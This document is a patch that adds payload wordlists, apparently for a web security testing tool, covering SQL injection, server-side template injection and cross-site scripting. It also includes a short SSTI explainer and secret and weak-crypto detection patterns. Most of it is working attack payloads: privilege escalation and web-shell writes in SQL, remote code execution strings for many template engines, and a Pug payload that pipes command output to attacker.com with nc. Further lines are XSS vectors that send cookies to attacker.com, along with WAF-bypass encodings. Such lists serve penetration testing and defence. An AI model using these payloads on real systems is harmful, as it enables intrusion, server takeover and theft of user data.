 ' AND 1=CTXSYS.DRITHSX.SN(1,(SELECT banner FROM v$version WHERE rownum=1))--
 # Second-order SQL injection
 username: admin'--
 password: anything
 # JSON-based SQL injection
 {"username":"admin' OR '1'='1","password":"x"}
 {"id":"1' UNION SELECT NULL--"}
 # XML-based SQL injection
 <user><name>admin' OR '1'='1</name></user>
 # LDAP + SQL combined
 *)(uid=*))(&(uid=admin' OR '1'='1
 # Cookie-based SQL injection
 Cookie: id=1' OR '1'='1--
 # HTTP Header injection
 User-Agent: ' OR '1'='1--
 Referer: ' OR '1'='1--
 X-Forwarded-For: ' OR '1'='1--
 # Routed SQL injection (through application)
 /?search=x' AND (SELECT * FROM users WHERE username='admin')--
 # Advanced boolean-based blind
 ' AND (SELECT SUBSTRING(password,1,1) FROM users WHERE username='admin')='a'--
 ' AND (SELECT ASCII(SUBSTRING(password,1,1)) FROM users LIMIT 1)>100--
 ' AND (SELECT LENGTH(password) FROM users WHERE username='admin')>5--
 # Bitwise operations
 ' AND (SELECT @@version)&1--
 ' AND (SELECT 1)^1=0--
 # String functions exploitation
 ' AND (SELECT REVERSE('olleh'))='hello'--
 ' AND (SELECT REPLACE('test','t','x'))='xesx'--
 ' AND (SELECT SUBSTRING('hello',1,1))='h'--
 # Database enumeration
 ' UNION SELECT schema_name,NULL FROM information_schema.schemata--
 ' UNION SELECT table_name,table_schema FROM information_schema.tables--
 ' UNION SELECT column_name,table_name FROM information_schema.columns--
 # Privilege escalation attempts
 '; GRANT ALL PRIVILEGES ON *.* TO 'attacker'@'%'--
 '; ALTER USER 'root'@'localhost' IDENTIFIED BY 'hacked'--
 '; CREATE USER attacker IDENTIFIED BY 'pass123'--
 # File operations
 # MySQL
 ' UNION SELECT LOAD_FILE('/etc/passwd')--
 ' INTO OUTFILE '/var/www/html/shell.php'--
 ' INTO DUMPFILE '/var/www/html/shell.php'--
 # PostgreSQL
 '; COPY (SELECT '') TO '/tmp/output.txt'--
 # MSSQL
 '; EXEC xp_cmdshell 'dir'--
 '; EXEC sp_configure 'xp_cmdshell',1--
 # Conditional responses
 ' AND IF(1=1,1,(SELECT 1 UNION SELECT 2))--
 ' AND CASE WHEN (1=1) THEN 1 ELSE 0 END--
 # Mass assignment attacks via SQL
 ' UPDATE users SET role='admin' WHERE username='attacker'--
 ' INSERT INTO users (username,role) VALUES ('attacker','admin')--
@@ -0,0 +1,37 @@
 # Server-Side Template Injection (SSTI)
 ## Description
 Server-Side Template Injection occurs when user input is embedded in a template in an unsafe manner, allowing attackers to inject template directives and execute arbitrary code on the server. SSTI can lead to remote code execution, information disclosure, and complete server compromise.
 ## Common Vulnerable Template Engines
 - **Jinja2** (Python - Flask, Django)
 - **Twig** (PHP)
 - **Freemarker** (Java)
 - **Velocity** (Java)
 - **Smarty** (PHP)
 - **Pug/Jade** (Node.js)
 - **ERB** (Ruby on Rails)
 - **Thymeleaf** (Java)
 ## Common Attack Vectors
 - User input in template rendering
 - Email templates with user-controlled content
 - Error messages with dynamic content
 - Markdown/Wiki renderers
 - PDF generators
 - Report generators
 ## Testing Approach
 1. Inject template syntax like `{{7*7}}` or `${7*7}` in input fields
 2. Observe if mathematical expressions are evaluated
 3. Identify the template engine through error messages or syntax
 4. Escalate to code execution using engine-specific payloads
 ## Detection Methods
 - Submit polyglot payloads: `${{<%[%'"}}%\`
 - Test mathematical operations: `{{7*7}}`, `${7*7}`
 - Check for template-specific syntax errors
 - Analyze response differences
 ## Payloads
 See `ssti-payloads.txt` for a comprehensive list of SSTI payloads.
@@ -0,0 +1,310 @@
 # Server-Side Template Injection (SSTI) Payloads
 # Detection/Polyglot payloads
 ${{<%[%'"}}%\
 {{7*7}}
 ${7*7}
 <%= 7*7 %>
 ${{7*7}}
 #{7*7}
 *{7*7}
 # Jinja2 (Python - Flask)
 # Basic detection
 {{7*7}}
 {{7*'7'}}
 {{config}}
 {{self}}
 # Information disclosure
 {{config.items()}}
 {{self.__dict__}}
 {{request.environ}}
 {{request.application.__globals__}}
 # File read
 {{''.__class__.__mro__[1].__subclasses__()[40]('/etc/passwd').read()}}
 {{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
 # Remote code execution
 {{self._TemplateReference__context.cycler.__init__.__globals__.os.popen('id').read()}}
 {{self._TemplateReference__context.joiner.__init__.__globals__.os.popen('whoami').read()}}
 {{''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read()}}
 {{config.__class__.__init__.__globals__['os'].popen('cat /etc/passwd').read()}}
 {{request.application.__globals__.__builtins__.__import__('os').popen('id').read()}}
 {{request['application']['__globals__']['__builtins__']['__import__']('os').popen('ls').read()}}
 {{lipsum.__globals__['os'].popen('whoami').read()}}
 {{cycler.__init__.__globals__.os.popen('id').read()}}
 {{joiner.__init__.__globals__.os.popen('id').read()}}
 {{namespace.__init__.__globals__.os.popen('id').read()}}
 # Jinja2 sandbox escape
 {{''.__class__.__base__.__subclasses__()}}
 {{[].__class__.__base__.__subclasses__()}}
 {{''.__class__.__mro__[1].__subclasses__()}}
 # Twig (PHP)
 # Basic detection
 {{7*7}}
 {{7*'7'}}
 {{dump(app)}}
 {{app.request.server.all|join(',')}}
 # Information disclosure
 {{_self.env.getGlobals()}}
 {{_self.env}}
 {{dump(_context)}}
 # Remote code execution
 {{_self.env.registerUndefinedFilterCallback("exec")}}{{_self.env.getFilter("id")}}
 {{_self.env.registerUndefinedFilterCallback("system")}}{{_self.env.getFilter("whoami")}}
 {{['id']|filter('system')}}
 {{['cat /etc/passwd']|filter('system')}}
 {{['cat\x20/etc/passwd']|filter('system')}}
 {{['id']|map('passthru')|join}}
 {{['whoami']|map('system')|join}}
 {{'a'.toUpperCase()}}
 {{1*1}}{{6*6}}
 # Freemarker (Java)
 # Basic detection
 ${7*7}
 #{7*7}
 <#assign ex="freemarker.template.utility.Execute"?new()> ${ex("id")}
 # Remote code execution
 <#assign ex="freemarker.template.utility.Execute"?new()>${ex("whoami")}
 <#assign ex="freemarker.template.utility.Execute"?new()>${ex("cat /etc/passwd")}
 <#assign ex="freemarker.template.utility.ObjectConstructor"?new()>${ex("java.lang.ProcessBuilder","id").start()}
 ${"freemarker.template.utility.Execute"?new()("id")}
 # Information disclosure
 ${.data_model}
 ${.globals}
 ${.main}
 ${.namespace}
 ${.current_namespace}
 ${.vars}
 # Velocity (Java)
 # Basic detection
 #set($x=7*7)$x
 ${{7*7}}
 # Remote code execution
 #set($str=$class.inspect("java.lang.String").type)
 #set($chr=$class.inspect("java.lang.Character").type)
 #set($ex=$class.inspect("java.lang.Runtime").type.getRuntime().exec("whoami"))
 #set($null=$ex.waitFor())
 #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
 #set($x='')##
 #set($rt=$x.class.forName('java.lang.Runtime'))##
 #set($chr=$x.class.forName('java.lang.Character'))##
 #set($str=$x.class.forName('java.lang.String'))##
 #set($ex=$rt.getRuntime().exec('id'))##
 $ex.waitFor()
 #set($out=$ex.getInputStream())##
 #foreach($i in [1..$out.available()])$str.valueOf($chr.toChars($out.read()))#end
 # Smarty (PHP)
 # Basic detection
 {$smarty.version}
 {php}echo `id`;{/php}
 {7*7}
 # Remote code execution
 {system('ls')}
 {system('cat /etc/passwd')}
 {php}system('id');{/php}
 {php}phpinfo();{/php}
 {Smarty_Internal_Write_File::writeFile($SCRIPT_NAME,"<?php passthru($_GET['cmd']); ?>",self::clearConfig())}
 # Information disclosure
 {$smarty.template}
 {$smarty.current_dir}
 {$smarty.template_dir}
 # Pug/Jade (Node.js)
 # Basic detection
 #{7*7}
 !{7*7}
 # Remote code execution
 #{function(){localLoad=global.process.mainModule.constructor._load;sh=localLoad("child_process").exec('whoami')}()}
 #{global.process.mainModule.require('child_process').exec('id')}
 #{global.process.mainModule.require('child_process').execSync('id').toString()}
 - var x = root.process
 - x = x.mainModule.require
 - x = x('child_process')
 = x.exec('id | nc attacker.com 8080')
 # ERB (Ruby on Rails)
 # Basic detection
 <%= 7*7 %>
 <%= system('whoami') %>
 # Remote code execution
 <%= system('id') %>
 <%= `id` %>
 <%= IO.popen('id').readlines() %>
 <%= require 'open3' %><%= Open3.capture2("id")[0] %>
 <%= File.open('/etc/passwd').read %>
 # Thymeleaf (Java)
 # Basic detection
 [[${7*7}]]
 [(${7*7})]
 [# th:block th:each="i : ${#numbers.sequence(1, 7*7)}" /]
 # Remote code execution (with SpringEL)
 ${T(java.lang.Runtime).getRuntime().exec('calc')}
 *{T(java.lang.Runtime).getRuntime().exec('calc')}
 *{T(org.apache.commons.io.IOUtils).toString(T(java.lang.Runtime).getRuntime().exec('id').getInputStream())}
 # Tornado (Python)
 # Basic detection
 {{7*7}}
 {% import os %}{{os.popen("id").read()}}
 # Remote code execution
 {% import subprocess %}{{subprocess.check_output('id',shell=True)}}
 {% import os %}{{os.system('whoami')}}
 # Mako (Python)
 # Basic detection
 ${7*7}
 <%={{7*7}%>
 # Remote code execution
 <%import os%>${os.popen("id").read()}
 ${__import__('os').popen('id').read()}
 # Django (Python)
 # Basic detection
 {{7*7}}
 {% debug %}
 # Limited RCE (usually sandboxed)
 {{request.META}}
 {{settings.SECRET_KEY}}
 # Handlebars (Node.js)
 # Basic detection
 {{7*7}}
 {{this}}
 # Prototype pollution
 {{#with "constructor"}}{{#with split as |a|}}{{pop (push "alert('XSS')")}}{{#with .}}{{#with (concat (lookup join (slice 0 1)))}}{{#each .}}{{#with (string.sub.call ../sub "constructor")}}{{this}}{{/with}}{{/each}}{{/with}}{{/with}}{{/with}}{{/with}}
 # Groovy (Java)
 # Basic detection
 ${7*7}
 <%= 7*7 %>
 # Remote code execution
 ${"".getClass().forName("java.lang.Runtime").getRuntime().exec("calc")}
 # Dot (JavaScript)
 # Basic detection
 {{=7*7}}
 # Remote code execution
 {{= global.process.mainModule.require('child_process').execSync('id').toString() }}
 # Nunjucks (JavaScript)
 # Basic detection
 {{7*7}}
 {{foo}}
 # Remote code execution
 {{range.constructor("return global.process.mainModule.require('child_process').execSync('id')")()}}
 # Razor (.NET)
 # Basic detection
@(7*7)
@{7*7}
 # Information disclosure
@System.Diagnostics.Process.GetCurrentProcess().Id
@Directory.GetFiles("C:\\")
 # EJS (JavaScript)
 # Basic detection
 <%=7*7%>
 # Remote code execution
 <%=global.process.mainModule.require('child_process').execSync('id')%>
 # Underscore/Lodash templates (JavaScript)
 # Basic detection
 <%=7*7%>
 # Remote code execution
 <%= _.template('test')() %>
 # Marko (JavaScript)
 # Basic detection
 ${7*7}
 # Remote code execution
 ${console.log(global.process.mainModule.require('child_process').execSync('id').toString())}
 # Plate (Rust)
 # Basic detection
 {{7*7}}
 # Liquid (Ruby)
 # Basic detection
 {{7 | times: 7}}
 # Scalate (Scala)
 # Basic detection
 ${7*7}
 <%=7*7%>
 # Template.js
 # Basic detection
 {{7*7}}
 # Trim (Java)
 # Basic detection
 ${7*7}
 # Jade/Pug continued (with more variants)
 - var x = global.process.mainModule.require
 !{x('child_process').execSync('cat /etc/passwd')}
 # ColdFusion
 # Basic detection
 #7*7#
 # ASP.NET Web Forms
 # Basic detection
 <%= 7*7 %>
 # Expression Language (Java EE)
 # Basic detection
 ${7*7}
 #{7*7}
 # Remote code execution
 ${pageContext.request.getSession().setAttribute("shell","".getClass().forName("java.lang.Runtime").getMethod("getRuntime").invoke(null).exec(request.getParameter("cmd")))}
 # Generic testing payloads
 {{self}}
 ${self}
 <%= self %>
 #{self}
 *{self}
@{self}
 {{constructor}}
 {{__class__}}
 {{__init__}}
 {{__globals__}}
 {{__import__}}
 # Blind SSTI detection
 a{{9999*9999}}b
 a${9999*9999}b
 a<%= 9999*9999 %>b
@@ -21,3 +21,208 @@ AKIA[0-9A-Z]{16}  # AWS Access Key pattern
 [0-9a-zA-Z]{32}  # Generic 32-char key
 ghp_[0-9a-zA-Z]{36}  # GitHub Personal Access Token pattern
 sk_live_[0-9a-zA-Z]{24}  # Stripe Live Secret Key pattern
 # Weak encryption algorithms
 # DES (Data Encryption Standard) - 56-bit key
 DES
 DES-CBC
 DES-ECB
 DES-EDE
 DES-EDE-CBC
 # 3DES with weak keys
 3DES
 DES-EDE3
 DES-EDE3-CBC
 # RC4 (Rivest Cipher 4)
 RC4
 RC4-40
 RC4-128
 ARCFOUR
 # RC2
 RC2
 RC2-40-CBC
 RC2-64-CBC
 RC2-CBC
 # MD5 hash algorithm (broken)
 MD5
 MD5-SHA1
 # SHA1 hash algorithm (weak)
 SHA1
 SHA-1
 # Weak RSA key sizes
 RSA-512
 RSA-768
 RSA-1024
 # ECB mode (Electronic Codebook) - deterministic
 AES-128-ECB
 AES-192-ECB
 AES-256-ECB
 # Weak padding schemes
 PKCS1-v1_5
 PKCS#1 v1.5
 # Null encryption
 NULL
 eNULL
 NULL-MD5
 NULL-SHA
 # Export grade ciphers
 EXP-DES-CBC-SHA
 EXP-RC2-CBC-MD5
 EXP-RC4-MD5
 # Anonymous key exchange (no authentication)
 AECDH
 ADH
 aNULL
 # Weak Diffie-Hellman
 DH-512
 DH-1024
 # CBC with weak MAC (BEAST/POODLE vulnerable)
 TLS_RSA_WITH_AES_128_CBC_SHA
 TLS_RSA_WITH_AES_256_CBC_SHA
 TLS_RSA_WITH_3DES_EDE_CBC_SHA
 # SSL/TLS version issues
 SSLv2
 SSLv3
 TLSv1.0
 TLSv1.1
 # Weak cipher suites
 TLS_RSA_WITH_RC4_128_SHA
 TLS_RSA_WITH_RC4_128_MD5
 TLS_RSA_WITH_DES_CBC_SHA
 TLS_DH_anon_WITH_AES_128_CBC_SHA
 # XOR cipher (trivial)
 XOR
 # Caesar cipher
 ROT13
 ROT47
 # Vigenere cipher patterns
 VIGENERE
 # Insecure random number generators
 # Predictable seeds
 PRNG with time() seed
 Math.random()
 rand()
 srand(time())
 # Weak key derivation functions
 PBKDF1
 MD5-based KDF
 SHA1-based KDF
 # Hardcoded encryption keys (testing patterns)
 key=00000000000000000000000000000000
 key=FFFFFFFFFFFFFFFFFFFFFFFFFFFFFFFF
 key=12345678901234567890123456789012
 secretkey=admin
 encryptionKey=password
 # Weak initialization vectors
 IV=00000000000000000000000000000000
 IV=11111111111111111111111111111111
 Fixed IV
 Reused IV
 # Predictable salts
 salt=salt
 salt=123456
 salt=""
 No salt
 # Hash collision examples
 # MD5 collisions
 d131dd02c5e6eec4693d9a0698aff95c  # Collision pair 1
 d131dd02c5e6eec4693d9a0698aff95c  # Collision pair 2
 # Timing attack vulnerabilities
 String comparison without constant time
 strcmp() without timing safety
 # Padding oracle indicators
 PaddingException
 Invalid padding
 Bad padding
 # ECB detection patterns (identical blocks)
 Block1: 0123456789ABCDEF
 Block2: 0123456789ABCDEF
 # Weak HMAC
 HMAC-MD5
 HMAC-SHA1
 # CRC (not cryptographic)
 CRC32
 CRC16
 ADLER32
 # Length extension attacks
 SHA-256 without HMAC
 SHA-512 without HMAC
 # Insecure modes of operation
 CTR without authentication
 CBC without HMAC
 OFB mode
 # Bit flipping attack vectors
 CBC mode tampering
 CFB mode tampering
 # Known weak parameters
 p=2  # Weak prime
 g=1  # Weak generator
 e=3  # Weak RSA exponent
 # Textbook RSA (no padding)
 RSA without OAEP
 RSA without PSS
 # Weak digital signatures
 DSA with k reuse
 ECDSA with k reuse
 DSA-SHA1
 # Certificate issues
 Self-signed certificates
 Expired certificates
 MD5 certificate signature
 SHA1 certificate signature
 # Java Cipher strings (weak)
 AES/ECB/NoPadding
 AES/ECB/PKCS5Padding
 DES/ECB/PKCS5Padding
 DESede/ECB/PKCS5Padding
 # OpenSSL weak ciphers
 openssl enc -des
 openssl enc -des3
 openssl enc -rc4
 # Bcrypt with low cost
 bcrypt cost < 10
 bcrypt rounds = 1
 # Scrypt with weak parameters
 N=2^10 (too low)
 r=1 (too low)
 p=1 (too low)
@@ -541,3 +541,215 @@ a="get";b="URL(ja\"";c="vascr";d="ipt:ale";e="rt('XSS');\")";eval(a+b+c+d+e);
 # SVG/HTML nesting XSS
 <svg></svg></iframe>
 # Modern XSS vectors and WAF bypasses
 # AngularJS template injection
 {{constructor.constructor('alert(1)')()}}
 {{$on.constructor('alert(1)')()}}
 {{$eval.constructor('alert(1)')()}}
 {{$parent.constructor('alert(1)')()}}
 <div ng-app ng-csp><div ng-controller="test">{{$eval.constructor('alert(1)')()}}</div></div>
 # VueJS template injection
 {{constructor.constructor('alert(1)')()}}
 {{_c.constructor('alert(1)')()}}
 <div v-html="'<img src=x onerror=alert(1)>'"></div>
 # React JSX injection
 <img src=x onerror={alert(1)} />
 <div dangerouslySetInnerHTML={{__html: '<img src=x onerror=alert(1)>'}} />
 # Mutation XSS (mXSS)
 <noscript><p title="</noscript><img src=x onerror=alert(1)>">
 <listing>&lt;img src=x onerror=alert(1)&gt;</listing>
 <style><img src=x onerror=alert(1)></style>
 # DOM clobbering
 <form id=test><input id=test2></form><form id=test2><input id=test></form>
 <img name=alert id=alert src=x onerror=alert(1)>
 <form name=test><input id=attributes></form>
 # Polyglot XSS
 jaVasCript:/*-/*`/*\`/*'/*"/**/(/* */oNcliCk=alert() )//%0D%0A%0d%0a//</stYle/</titLe/</teXtarEa/</scRipt/--!>\x3csVg/<sVg/oNloAd=alert()//>\x3e
 ';alert(String.fromCharCode(88,83,83))//';alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//";alert(String.fromCharCode(88,83,83))//--></SCRIPT>">'><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT>
 # HTML5 new tags
 <details open ontoggle=alert(1)>
 <details open ontoggle="alert(1)">
 <marquee onstart=alert(1)>
 <meter onmouseover=alert(1)>0</meter>
 <progress value=0 max=100 onmouseover=alert(1)>
 <dialog open onclose=alert(1)>
 <keygen onfocus=alert(1)>
 # WebSocket XSS
 <script>ws=new WebSocket('ws://attacker.com');ws.send(document.cookie);</script>
 # postMessage XSS
 <script>parent.postMessage('<img src=x onerror=alert(1)>','*')</script>
 <iframe src="javascript:parent.postMessage('<img src=x onerror=alert(1)>','*')">
 # Web Worker XSS
 <script>w=new Worker('data:text/javascript,postMessage(document.cookie)');</script>
 # Service Worker XSS
 <script>navigator.serviceWorker.register('data:text/javascript,alert(1)')</script>
 # CSS-based XSS
 <style>@import'data:text/css,body{background:url(javascript:alert(1))}';</style>
 <style>*{background:url('javascript:alert(1)')}</style>
 <link rel=stylesheet href='data:text/css,*{x:expression(alert(1))}'>
 # XML namespace XSS
 <html xmlns:xss>
 <?import namespace="xss" implementation="http://attacker.com/xss.htc"?>
 <xss:xss>test</xss:xss>
 # XSLT XSS
 <xsl:value-of select="system-property('xsl:vendor')"/>
 <xsl:template match="/">
 <script>alert(1)</script>
 </xsl:template>
 # Unicode bypass
 \u003cscript\u003ealert(1)\u003c/script\u003e
 <script>alert\u0028 1\u0029</script>
 \x3cscript\x3ealert(1)\x3c/script\x3e
 # Octal encoding
 \74\163\143\162\151\160\164\76alert(1)\74\57\163\143\162\151\160\164\76
 # Hex encoding
 \x3c\x73\x63\x72\x69\x70\x74\x3ealert(1)\x3c\x2f\x73\x63\x72\x69\x70\x74\x3e
 # HTML entity encoding
 &lt;script&gt;alert(1)&lt;/script&gt;
 &#60;script&#62;alert(1)&#60;/script&#62;
 &#x3c;script&#x3e;alert(1)&#x3c;/script&#x3e;
 # Double encoding
 %253Cscript%253Ealert(1)%253C%2Fscript%253E
 # UTF-7 encoding
 +ADw-script+AD4-alert(1)+ADw-/script+AD4-
 # WAF bypass with comments
 <scr<!---->ipt>alert(1)</scr<!---->ipt>
 <scr<script>ipt>alert(1)</scr</script>ipt>
 # WAF bypass with null bytes
 <script\x00>alert(1)</script>
 <scri\x00pt>alert(1)</scri\x00pt>
 # WAF bypass with newlines
 <script
 >alert(1)</script>
 <scri\npt>alert(1)</scri\npt>
 # Obfuscated JavaScript
 <script>eval(atob('YWxlcnQoMSk='))</script>
 <script>Function('alert(1)')()</script>
 <script>[1].map(alert)</script>
 <script>top[/al/.source+/ert/.source](1)</script>
 # JSFuck
 [][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]][([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+([][[]]+[])[+!+[]]+(![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[+!+[]]+([][[]]+[])[+[]]+([][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[+!+[]+[+[]]]+(!![]+[])[+!+[]]]((![]+[])[+!+[]]+(![]+[])[!+[]+!+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]+(!![]+[])[+[]]+(![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]]+[+!+[]]+(!![]+[][(![]+[])[+[]]+([![]]+[][[]])[+!+[]+[+[]]]+(![]+[])[!+[]+!+[]]+(!![]+[])[+[]]+(!![]+[])[!+[]+!+[]+!+[]]+(!![]+[])[+!+[]]])[!+[]+!+[]+[+[]]])()
 # Content Security Policy bypass
 <link rel="prefetch" href="javascript:alert(1)">
 <link rel="prerender" href="javascript:alert(1)">
 <base href="javascript:alert(1)//">
 # srcdoc iframe XSS
 <iframe srcdoc="<script>alert(1)</script>">
 <iframe srcdoc="&lt;script&gt;alert(1)&lt;/script&gt;">
 # HTML imports XSS
 <link rel="import" href="data:text/html,<script>alert(1)</script>">
 # Script gadgets
 <div id=x tabindex=1 onfocus=alert(1)></div><input value=clickme>
 <input onfocus=alert(1) autofocus>
 <input onblur=alert(1) autofocus><input autofocus>
 <video poster=javascript:alert(1)//></video>
 <body onload=alert(1)>
 <body oninput=alert(1)><input autofocus>
 # RPO (Relative Path Overwrite)
 <script src="//attacker.com/poc.js"></script>
 <script src="/poc.js"></script>
 # Dangling markup injection
 "><img src='//attacker.com?
 '><img src='//attacker.com?
 # AngularJS 1.6+ sandbox bypass
 {{constructor.constructor('alert(1)')()}}
 {{$on.constructor('alert(1)')()}}
 {{toString.constructor.prototype.toString=toString.constructor.prototype.call;["a","alert(1)"].sort(toString.constructor)}}
 # Template literals
 <script>eval(`alert\x281\x29`)</script>
 <script>Function`x${alert`1`}x`</script>
 # Arrow functions
 <script>_=alert,_(1)</script>
 <script>(alert)(1)</script>
 <script>[alert][0](1)</script>
 # ES6 features
 <script>({alert}={alert:alert},{alert}(1))</script>
 <script>[a,b,c,...alert]=1</script>
 # Event handlers with spaces
 < img src=x onerror=alert(1)>
 <img src=x onerror= alert(1)>
 <img src=x onerror = alert(1)>
 # Without quotes
 <img src=x onerror=alert(1)>
 <img src=x onerror=alert`1`>
 <img src=x onerror=alert(document.domain)>
 # Protocol-relative URL
 <script src=//attacker.com/xss.js></script>
 <img src=//attacker.com/x onerror=alert(1)>
 # Meta refresh XSS
 <meta http-equiv="refresh" content="0;url=javascript:alert(1)">
 <meta http-equiv="refresh" content="0;url=data:text/html,<script>alert(1)</script>">
 # Form action XSS
 <form action="javascript:alert(1)"><input type=submit></form>
 <form><button formaction="javascript:alert(1)">Click</button></form>
 # Object data XSS
 <object data="javascript:alert(1)">
 <object data="data:text/html,<script>alert(1)</script>">
 # Embed src XSS
 <embed src="javascript:alert(1)">
 <embed src="data:text/html,<script>alert(1)</script>">
 # Applet XSS
 <applet code="java.lang.Runtime">
 # Audio/Video XSS
 <audio src=x onerror=alert(1)>
 <video src=x onerror=alert(1)>
 # Picture XSS
 <picture><source srcset="javascript:alert(1)"></picture>
 # Track XSS
 <video><track default src="javascript:alert(1)"></video>
 # Shadow DOM XSS
 <div><template shadowroot=open><script>alert(1)</script></template></div>
 # Custom elements XSS
 <custom-element onconnected=alert(1)>
 # Web Components XSS
 <x-element><script>alert(1)</script></x-element>